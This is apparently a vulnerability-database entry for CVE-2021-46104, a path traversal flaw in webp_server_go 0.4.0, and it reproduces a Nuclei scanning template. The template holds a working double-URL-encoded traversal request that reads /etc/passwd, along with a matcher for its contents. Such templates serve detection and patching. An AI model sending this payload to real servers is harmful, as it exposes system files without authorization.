Lucene search
K

webp_server_go 0.4.0 - Path Traversal

šŸ—“ļøĀ 07 Jul 2026Ā 03:01:27Reported byĀ ProjectDiscoveryTypeĀ 
nuclei
Ā nuclei
šŸ”—Ā github.comšŸ‘Ā 16Ā Views

webp_server_go 0.4.0 path traversal flaw allows reading arbitrary server files via crafted GET requests.

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2021-46104
19 Jan 202213:15
–attackerkb
Circl
CVE-2021-46104
19 Jan 202216:25
–circl
CNNVD
Webp_Server_Go č·Æå¾„éåŽ†ę¼ę“ž
19 Jan 202200:00
–cnnvd
CVE
CVE-2021-46104
19 Jan 202212:26
–cve
Cvelist
CVE-2021-46104
19 Jan 202212:26
–cvelist
EUVD
EUVD-2021-32804
3 Oct 202520:07
–euvd
NVD
CVE-2021-46104
19 Jan 202213:15
–nvd
Prion
Directory traversal
19 Jan 202213:15
–prion
Veracode
Directory Traversal
20 Jan 202205:16
–veracode
id: CVE-2021-46104

info:
  name: webp_server_go 0.4.0 - Path Traversal
  author: pikpikcu
  severity: high
  description: |
    webp_server_go 0.4.0 contains a path traversal caused by insufficient sanitization in file handling, letting attackers read arbitrary files on the server, exploit requires attacker to send crafted requests.
  impact: |
    Unauthenticated attackers can read arbitrary files from the server including /etc/passwd via path traversal using double URL encoding.
  remediation: |
    Upgrade to webp_server_go version 0.4.1 or later that properly sanitizes file paths.
  reference:
    - https://github.com/webp-sh/webp_server_go/issues/92
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-46104
    cwe-id: CWE-22
    epss-score: 0.04231
    epss-percentile: 0.89817
    cpe: cpe:2.3:a:webp:webp_server_go:0.4.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: webp
    product: webp_server_go
    shodan-query: http.html:"Webp"
  tags: cve,cve2021,lfi,webp,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0"

      - type: status
        status:
          - 200
# digest: 490a0046304402202090e9700af170c072b63da9d2860f351efc99171b0dd9a490704a994592404a02203178c39c3c885a1933d5cb2ff28774178292aee047c6020df3575e780502d29c:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation withĀ Vulners data

WeĀ provide theĀ essential building blocks forĀ cybersecurity solutions withĀ comprehensive, structured, andĀ constantly updated vulnerability andĀ exploits data

Api

Power your application withĀ Vulners API

The Vulners REST API offers reliable, high-performance access toĀ vulnerabilityĀ intelligence, withĀ 99.9%Ā SLAĀ uptime andĀ CDN-backed data delivery forĀ seamlessĀ global access

App

Assess and manage vulnerabilities withĀ VulnersĀ tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 25
CVSS 3.17.5
EPSS0.04231
16